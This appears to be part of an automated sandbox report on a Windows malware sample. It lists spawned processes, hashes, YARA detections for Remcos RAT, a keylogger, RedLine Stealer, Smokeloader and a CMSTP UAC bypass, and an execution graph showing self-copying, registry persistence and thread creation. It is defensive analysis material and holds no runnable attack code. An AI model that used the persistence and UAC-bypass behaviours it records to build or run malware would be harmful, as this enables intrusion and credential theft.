                                                • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000011.00000002.4623907696.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000011.00000002.4623907696.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000011.00000002.4623907696.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000011.00000002.4623907696.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Author: unknown
                                                • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000011.00000002.4623907696.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Author: unknown
                                                • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000011.00000002.4623907696.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Author: ditekSHen
                                                • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000011.00000003.2263067478.00000000021E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000011.00000003.2263067478.00000000021E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000011.00000003.2263067478.00000000021E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000011.00000003.2263067478.00000000021E0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000011.00000003.2263067478.00000000021E0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000011.00000003.2263067478.00000000021E0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                Antivirus matches:
                                                • Detection: 71%, ReversingLabs
                                                Reputation:low
                                                Has exited:false

                                                Target ID:19
                                                Start time:00:12:47
                                                Start date:11/01/2025
                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 1612 -s 1300
                                                Imagebase:0x710000
                                                File size:483'680 bytes
                                                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:20
                                                Start time:00:12:48
                                                Start date:11/01/2025
                                                Path:C:\Users\user\AppData\Roaming\xenor\yavascript.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\AppData\Roaming\xenor\yavascript.exe"
                                                Imagebase:0x400000
                                                File size:397'312 bytes
                                                MD5 hash:A0ACD7920F09A59331E008F8D3DC7AC1
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000014.00000002.2309360524.0000000000600000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000014.00000002.2309481158.0000000000698000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000014.00000003.2272754089.0000000002200000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000014.00000003.2272754089.0000000002200000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000014.00000003.2272754089.0000000002200000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000014.00000003.2272754089.0000000002200000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000014.00000003.2272754089.0000000002200000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000014.00000003.2272754089.0000000002200000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000014.00000002.2309595604.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000014.00000002.2309595604.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000014.00000002.2309595604.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000014.00000002.2309595604.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000014.00000002.2309595604.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000014.00000002.2309137529.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000014.00000002.2309137529.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000014.00000002.2309137529.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000014.00000002.2309137529.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Author: unknown
                                                • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000014.00000002.2309137529.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Author: unknown
                                                • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000014.00000002.2309137529.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Author: ditekSHen
                                                Reputation:low
                                                Has exited:true

                                                Target ID:22
                                                Start time:00:12:48
                                                Start date:11/01/2025
                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 1512 -s 708
                                                Imagebase:0x710000
                                                File size:483'680 bytes
                                                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:24
                                                Start time:00:12:49
                                                Start date:11/01/2025
                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 4196 -s 472
                                                Imagebase:0x710000
                                                File size:483'680 bytes
                                                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:26
                                                Start time:00:12:50
                                                Start date:11/01/2025
                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 1512 -s 716
                                                Imagebase:0x710000
                                                File size:483'680 bytes
                                                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:29
                                                Start time:00:12:51
                                                Start date:11/01/2025
                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 1512 -s 744
                                                Imagebase:0x710000
                                                File size:483'680 bytes
                                                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:31
                                                Start time:00:12:52
                                                Start date:11/01/2025
                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 1512 -s 708
                                                Imagebase:0x710000
                                                File size:483'680 bytes
                                                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:34
                                                Start time:00:12:53
                                                Start date:11/01/2025
                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 1512 -s 752
                                                Imagebase:0x710000
                                                File size:483'680 bytes
                                                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:37
                                                Start time:00:12:55
                                                Start date:11/01/2025
                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 1512 -s 920
                                                Imagebase:0x710000
                                                File size:483'680 bytes
                                                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:38
                                                Start time:00:12:56
                                                Start date:11/01/2025
                                                Path:C:\Users\user\AppData\Roaming\xenor\yavascript.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\AppData\Roaming\xenor\yavascript.exe"
                                                Imagebase:0x400000
                                                File size:397'312 bytes
                                                MD5 hash:A0ACD7920F09A59331E008F8D3DC7AC1
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000026.00000002.2378502507.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000026.00000002.2378390823.0000000000748000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000026.00000003.2355139636.0000000002200000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000026.00000003.2355139636.0000000002200000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000026.00000003.2355139636.0000000002200000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000026.00000003.2355139636.0000000002200000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000026.00000003.2355139636.0000000002200000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000026.00000003.2355139636.0000000002200000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000026.00000002.2378144683.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000026.00000002.2378144683.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000026.00000002.2378144683.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000026.00000002.2378144683.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Author: unknown
                                                • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000026.00000002.2378144683.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Author: unknown
                                                • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000026.00000002.2378144683.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Author: ditekSHen
                                                • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000026.00000002.2378583588.0000000002180000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000026.00000002.2378583588.0000000002180000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000026.00000002.2378583588.0000000002180000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000026.00000002.2378583588.0000000002180000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000026.00000002.2378583588.0000000002180000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                Has exited:true

                                                  Execution Graph

                                                  Execution Coverage:1.2%
                                                  Dynamic/Decrypted Code Coverage:23.6%
                                                  Signature Coverage:31.2%
                                                  Total number of Nodes:749
                                                  Total number of Limit Nodes:24
40dc7e 88005->88007 88010 41ae08 28 API calls 88007->88010 88008 40dd65 CreateThread 88008->88004 88511 41c96f 10 API calls 88008->88511 88011 40dd96 88009->88011 88012 40dc87 88010->88012 88013 401f66 28 API calls 88011->88013 88348 40e219 112 API calls 88012->88348 88015 40dda5 88013->88015 88353 41a686 79 API calls 88015->88353 88016 40dc8c 88016->87978 88018 40dc93 88016->88018 88018->87917 88019 40ddaa 88020 401d64 22 API calls 88019->88020 88021 40ddb6 88020->88021 88022 401d64 22 API calls 88021->88022 88023 40ddcb 88022->88023 88024 401d64 22 API calls 88023->88024 88025 40ddeb 88024->88025 88354 43a5e7 39 API calls _strftime 88025->88354 88027 40ddf8 88028 401d64 22 API calls 88027->88028 88029 40de03 88028->88029 88030 401d64 22 API calls 88029->88030 88031 40de14 88030->88031 88032 401d64 22 API calls 88031->88032 88033 40de29 88032->88033 88034 401d64 22 API calls 88033->88034 88035 40de3a 88034->88035 88036 40de41 StrToIntA 88035->88036 88355 409517 143 API calls _wcslen 88036->88355 88038 40de53 88039 401d64 22 API calls 88038->88039 88041 40de5c 88039->88041 88040 40dea1 88044 401d64 22 API calls 88040->88044 88041->88040 88356 43360d 22 API calls 3 library calls 88041->88356 88043 40de71 88045 401d64 22 API calls 88043->88045 88048 40deb1 88044->88048 88046 40de84 88045->88046 88049 40de8b CreateThread 88046->88049 88047 40def9 88051 401d64 22 API calls 88047->88051 88048->88047 88357 43360d 22 API calls 3 library calls 88048->88357 88049->88040 88507 419128 109 API calls 2 library calls 88049->88507 88056 40df02 88051->88056 88052 40dec6 88053 401d64 22 API calls 88052->88053 88054 40ded8 88053->88054 88057 40dedf CreateThread 88054->88057 88055 40df6c 88058 401d64 22 API calls 88055->88058 88056->88055 88059 401d64 22 API calls 88056->88059 88057->88047 88510 419128 109 API calls 2 library calls 88057->88510 88061 40df75 88058->88061 88060 40df1e 88059->88060 88063 401d64 22 API calls 88060->88063 88062 40dfba 88061->88062 88064 401d64 22 API 
calls 88061->88064 88361 41a7a2 30 API calls 88062->88361 88065 40df33 88063->88065 88067 40df8a 88064->88067 88358 40c854 32 API calls 88065->88358 88073 401d64 22 API calls 88067->88073 88068 40dfc3 88069 401e18 11 API calls 88068->88069 88070 40dfce 88069->88070 88072 401e13 11 API calls 88070->88072 88075 40dfd7 CreateThread 88072->88075 88076 40df9f 88073->88076 88074 40df46 88077 401e18 11 API calls 88074->88077 88080 40e004 88075->88080 88081 40dff8 CreateThread 88075->88081 88512 40e54f 82 API calls 88075->88512 88359 43a5e7 39 API calls _strftime 88076->88359 88079 40df52 88077->88079 88082 401e13 11 API calls 88079->88082 88083 40e019 88080->88083 88084 40e00d CreateThread 88080->88084 88081->88080 88506 410f36 139 API calls 88081->88506 88086 40df5b CreateThread 88082->88086 88088 40e073 88083->88088 88090 401f66 28 API calls 88083->88090 88084->88083 88508 411524 38 API calls ___scrt_fastfail 88084->88508 88086->88055 88509 40196b 49 API calls _strftime 88086->88509 88087 40dfac 88360 40b95c 7 API calls 88087->88360 88364 41246e RegOpenKeyExA RegQueryValueExA RegCloseKey 88088->88364 88091 40e046 88090->88091 88362 404c9e 28 API calls 88091->88362 88094 40e053 88096 401f66 28 API calls 88094->88096 88095 40e08b 88097 40e12a 88095->88097 88100 41ae08 28 API calls 88095->88100 88098 40e062 88096->88098 88367 40cbac 27 API calls 88097->88367 88363 41a686 79 API calls 88098->88363 88103 40e0a4 88100->88103 88102 40e12f 88368 413fd4 170 API calls _strftime 88102->88368 88365 412584 31 API calls 88103->88365 88104 40e067 88106 401eea 11 API calls 88104->88106 88106->88088 88108 40e0ba 88109 401e13 11 API calls 88108->88109 88112 40e0c5 88109->88112 88110 40e0ed DeleteFileW 88111 40e0f4 88110->88111 88110->88112 88114 41ae08 28 API calls 88111->88114 88112->88110 88112->88111 88113 40e0db Sleep 88112->88113 88113->88112 88115 40e104 88114->88115 88366 41297a RegOpenKeyExW RegDeleteValueW 88115->88366 88117 40e117 88118 401e13 11 API calls 88117->88118 88119 
40e121 88118->88119 88120 401e13 11 API calls 88119->88120 88120->88097 88121->87816 88122->87823 88123->87820 88124->87830 88125->87832 88126->87835 88127->87810 88128->87813 88129->87817 88130->87839 88131->87841 88132->87843 88133->87846 88134->87849 88136 44dddb 88135->88136 88137 44ddd2 88135->88137 88136->87853 88140 44dcc8 48 API calls 4 library calls 88137->88140 88139->87853 88140->88136 88142 41bd22 LoadLibraryA GetProcAddress 88141->88142 88143 41bd12 GetModuleHandleA GetProcAddress 88141->88143 88144 41bd4b 32 API calls 88142->88144 88145 41bd3b LoadLibraryA GetProcAddress 88142->88145 88143->88142 88144->87858 88145->88144 88371 41a63f FindResourceA 88146->88371 88149 43a88c ___std_exception_copy 21 API calls 88150 40e192 ctype 88149->88150 88374 401f86 88150->88374 88153 401eef 11 API calls 88154 40e1b8 88153->88154 88155 401eea 11 API calls 88154->88155 88156 40e1c1 88155->88156 88157 43a88c ___std_exception_copy 21 API calls 88156->88157 88158 40e1d2 ctype 88157->88158 88378 406052 88158->88378 88160 40e205 88160->87860 88162 40e8ca 88161->88162 88164 40e8da 88162->88164 88381 40200a 11 API calls 88162->88381 88164->87868 88166 404ccb 88165->88166 88382 402e78 88166->88382 88168 404cee 88168->87882 88391 404bc4 88169->88391 88171 405cf4 88171->87885 88400 401e8f 88172->88400 88174 40bee1 CreateMutexA GetLastError 88174->87915 88402 41b15b 88175->88402 88177 41a471 88406 412513 RegOpenKeyExA 88177->88406 88180 401eef 11 API calls 88181 41a49f 88180->88181 88182 401eea 11 API calls 88181->88182 88183 41a4a7 88182->88183 88184 41a4fa 88183->88184 88185 412513 31 API calls 88183->88185 88184->87920 88186 41a4cd 88185->88186 88187 41a4d8 StrToIntA 88186->88187 88188 41a4ef 88187->88188 88189 41a4e6 88187->88189 88191 401eea 11 API calls 88188->88191 88411 41c102 22 API calls 88189->88411 88191->88184 88193 40698f 88192->88193 88194 4124b7 3 API calls 88193->88194 88195 406996 88194->88195 88195->87931 88195->87932 88197 41ae1c 88196->88197 88412 40b027 
88197->88412 88199 41ae24 88199->87946 88201 401e27 88200->88201 88203 401e33 88201->88203 88421 402121 11 API calls 88201->88421 88203->87949 88205 402121 88204->88205 88206 402150 88205->88206 88422 402718 11 API calls _Deallocate 88205->88422 88206->87952 88209 40c8ba 88208->88209 88210 40c8d0 88209->88210 88211 40c8da 88209->88211 88212 40c90f 88209->88212 88214 40ca03 GetLongPathNameW 88210->88214 88427 41a74b 29 API calls 88211->88427 88215 41b15b 2 API calls 88212->88215 88423 403b40 88214->88423 88218 40c914 88215->88218 88216 40c8e3 88219 401e18 11 API calls 88216->88219 88221 40c918 88218->88221 88222 40c96a 88218->88222 88223 40c8ed 88219->88223 88226 403b40 28 API calls 88221->88226 88225 403b40 28 API calls 88222->88225 88230 401e13 11 API calls 88223->88230 88224 403b40 28 API calls 88228 40ca27 88224->88228 88229 40c978 88225->88229 88227 40c926 88226->88227 88235 403b40 28 API calls 88227->88235 88430 40cc37 28 API calls 88228->88430 88234 403b40 28 API calls 88229->88234 88230->88210 88232 40ca3a 88431 402860 28 API calls 88232->88431 88237 40c98e 88234->88237 88238 40c93c 88235->88238 88236 40ca45 88432 402860 28 API calls 88236->88432 88429 402860 28 API calls 88237->88429 88428 402860 28 API calls 88238->88428 88242 40ca4f 88245 401e13 11 API calls 88242->88245 88243 40c999 88246 401e18 11 API calls 88243->88246 88244 40c947 88247 401e18 11 API calls 88244->88247 88248 40ca59 88245->88248 88249 40c9a4 88246->88249 88250 40c952 88247->88250 88251 401e13 11 API calls 88248->88251 88252 401e13 11 API calls 88249->88252 88253 401e13 11 API calls 88250->88253 88254 40ca62 88251->88254 88255 40c9ad 88252->88255 88256 40c95b 88253->88256 88257 401e13 11 API calls 88254->88257 88258 401e13 11 API calls 88255->88258 88259 401e13 11 API calls 88256->88259 88260 40ca6b 88257->88260 88258->88223 88259->88223 88261 401e13 11 API calls 88260->88261 88262 40ca74 88261->88262 88263 401e13 11 API calls 88262->88263 88264 40ca7d 88263->88264 88264->87985 88266 
40bc7a _wcslen 88265->88266 88267 40bc84 88266->88267 88268 40bcce 88266->88268 88270 40bc8d CreateDirectoryW 88267->88270 88269 40c89e 32 API calls 88268->88269 88271 40bce0 88269->88271 88434 40856b 88270->88434 88272 401e18 11 API calls 88271->88272 88274 40bccc 88272->88274 88276 401e13 11 API calls 88274->88276 88275 40bca9 88468 4028cf 88275->88468 88281 40bcf7 88276->88281 88278 40bcb5 88279 401e18 11 API calls 88278->88279 88280 40bcc3 88279->88280 88282 401e13 11 API calls 88280->88282 88283 40bd10 88281->88283 88284 40bd2d 88281->88284 88282->88274 88287 40bb7b 31 API calls 88283->88287 88285 40bd36 CopyFileW 88284->88285 88286 40be07 88285->88286 88288 40bd48 _wcslen 88285->88288 88440 40bb7b 88286->88440 88316 40bd21 88287->88316 88288->88286 88290 40bd64 88288->88290 88291 40bdb7 88288->88291 88294 40c89e 32 API calls 88290->88294 88293 40c89e 32 API calls 88291->88293 88299 40bdbd 88293->88299 88298 40bd6a 88294->88298 88295 40be21 88303 40be2a SetFileAttributesW 88295->88303 88296 40be4d 88297 40be95 CloseHandle 88296->88297 88300 403b40 28 API calls 88296->88300 88466 401e07 88297->88466 88302 401e18 11 API calls 88298->88302 88301 401e18 11 API calls 88299->88301 88305 40be63 88300->88305 88334 40bdb1 88301->88334 88306 40bd76 88302->88306 88318 40be39 _wcslen 88303->88318 88308 41ae08 28 API calls 88305->88308 88309 401e13 11 API calls 88306->88309 88307 40beb1 ShellExecuteW 88310 40bec4 88307->88310 88311 40bece ExitProcess 88307->88311 88312 40be76 88308->88312 88313 40bd7f 88309->88313 88315 40bed7 CreateMutexA GetLastError 88310->88315 88471 412774 RegCreateKeyW 88312->88471 88317 40856b 28 API calls 88313->88317 88314 401e13 11 API calls 88320 40bdcf 88314->88320 88315->88316 88316->87992 88319 40bd93 88317->88319 88318->88296 88321 40be4a SetFileAttributesW 88318->88321 88324 4028cf 28 API calls 88319->88324 88323 40bddb CreateDirectoryW 88320->88323 88321->88296 88327 401e07 88323->88327 88326 40bd9f 88324->88326 88328 401e18 11 API calls 
88326->88328 88330 40bdeb CopyFileW 88327->88330 88331 40bda8 88328->88331 88329 401e13 11 API calls 88329->88297 88330->88286 88332 40bdf8 88330->88332 88333 401e13 11 API calls 88331->88333 88332->88316 88333->88334 88334->88314 88335->87876 88336->87886 88338->87907 88340 4124e1 RegQueryValueExA RegCloseKey 88339->88340 88341 41250b 88339->88341 88340->88341 88341->87903 88342->87910 88343->87939 88344->87932 88345->87923 88346->87937 88347->87996 88348->88016 88349->87978 88350->87997 88351->88002 88352->88008 88353->88019 88354->88027 88355->88038 88356->88043 88357->88052 88358->88074 88359->88087 88360->88062 88361->88068 88362->88094 88363->88104 88364->88095 88365->88108 88366->88117 88367->88102 88505 419e89 104 API calls 88368->88505 88369->87930 88372 40e183 88371->88372 88373 41a65c LoadResource LockResource SizeofResource 88371->88373 88372->88149 88373->88372 88375 401f8e 88374->88375 88376 402325 28 API calls 88375->88376 88377 401fa4 88376->88377 88377->88153 88379 401f86 28 API calls 88378->88379 88380 406066 88379->88380 88380->88160 88381->88164 88384 402e85 88382->88384 88383 402ea9 88383->88168 88384->88383 88385 402e98 88384->88385 88387 402eae 88384->88387 88389 403445 28 API calls 88385->88389 88387->88383 88390 40225b 11 API calls 88387->88390 88389->88383 88390->88383 88392 404bd0 88391->88392 88395 40245c 88392->88395 88394 404be4 88394->88171 88396 402469 88395->88396 88398 402478 88396->88398 88399 402ad3 28 API calls 88396->88399 88398->88394 88399->88398 88401 401e94 88400->88401 88403 41b183 88402->88403 88404 41b168 GetCurrentProcess IsWow64Process 88402->88404 88403->88177 88404->88403 88405 41b17f 88404->88405 88405->88177 88407 412541 RegQueryValueExA RegCloseKey 88406->88407 88408 412569 88406->88408 88407->88408 88409 401f66 28 API calls 88408->88409 88410 41257e 88409->88410 88410->88180 88411->88188 88413 40b02f 88412->88413 88416 40b04b 88413->88416 88415 40b045 88415->88199 88417 40b055 88416->88417 88419 40b060 
88417->88419 88420 40b138 28 API calls 88417->88420 88419->88415 88420->88419 88421->88203 88422->88206 88424 403b48 88423->88424 88433 403b7a 28 API calls 88424->88433 88426 403b5a 88426->88224 88427->88216 88428->88244 88429->88243 88430->88232 88431->88236 88432->88242 88433->88426 88435 408577 88434->88435 88477 402ca8 88435->88477 88439 4085a3 88439->88275 88441 40bba1 88440->88441 88442 40bbdd 88440->88442 88495 40b0dd 88441->88495 88444 40bc1e 88442->88444 88447 40b0dd 28 API calls 88442->88447 88446 40bc5f 88444->88446 88450 40b0dd 28 API calls 88444->88450 88446->88295 88446->88296 88448 40bbf4 88447->88448 88451 4028cf 28 API calls 88448->88451 88449 4028cf 28 API calls 88452 40bbbd 88449->88452 88453 40bc35 88450->88453 88454 40bbfe 88451->88454 88455 412774 14 API calls 88452->88455 88456 4028cf 28 API calls 88453->88456 88457 412774 14 API calls 88454->88457 88458 40bbd1 88455->88458 88459 40bc3f 88456->88459 88460 40bc12 88457->88460 88461 401e13 11 API calls 88458->88461 88462 412774 14 API calls 88459->88462 88463 401e13 11 API calls 88460->88463 88461->88442 88464 40bc53 88462->88464 88463->88444 88465 401e13 11 API calls 88464->88465 88465->88446 88467 401e0c 88466->88467 88501 402d8b 88468->88501 88470 4028dd 88470->88278 88472 412789 88471->88472 88473 4127c6 88471->88473 88476 4127a2 RegSetValueExW RegCloseKey 88472->88476 88474 401e13 11 API calls 88473->88474 88475 40be89 88474->88475 88475->88329 88476->88473 88478 402cb5 88477->88478 88479 402cc8 88478->88479 88481 402cd9 88478->88481 88482 402cde 88478->88482 88488 403374 28 API calls 88479->88488 88484 402de3 88481->88484 88482->88481 88489 402f21 11 API calls 88482->88489 88485 402daf 88484->88485 88490 4030f7 88485->88490 88487 402dcd 88487->88439 88488->88481 88489->88481 88491 403101 88490->88491 88493 403115 88491->88493 88494 4036c2 28 API calls 88491->88494 88493->88487 88494->88493 88496 40b0e9 88495->88496 88497 402ca8 28 API calls 88496->88497 88498 40b10c 88497->88498 88499 
402de3 28 API calls 88498->88499 88500 40b11f 88499->88500 88500->88449 88502 402d97 88501->88502 88503 4030f7 28 API calls 88502->88503 88504 402dab 88503->88504 88504->88470 88513 411637 62 API calls 88506->88513

                                                  Control-flow Graph

                                                  APIs
                                                  • LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BCF8
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041BD01
                                                  • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD18
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041BD1B
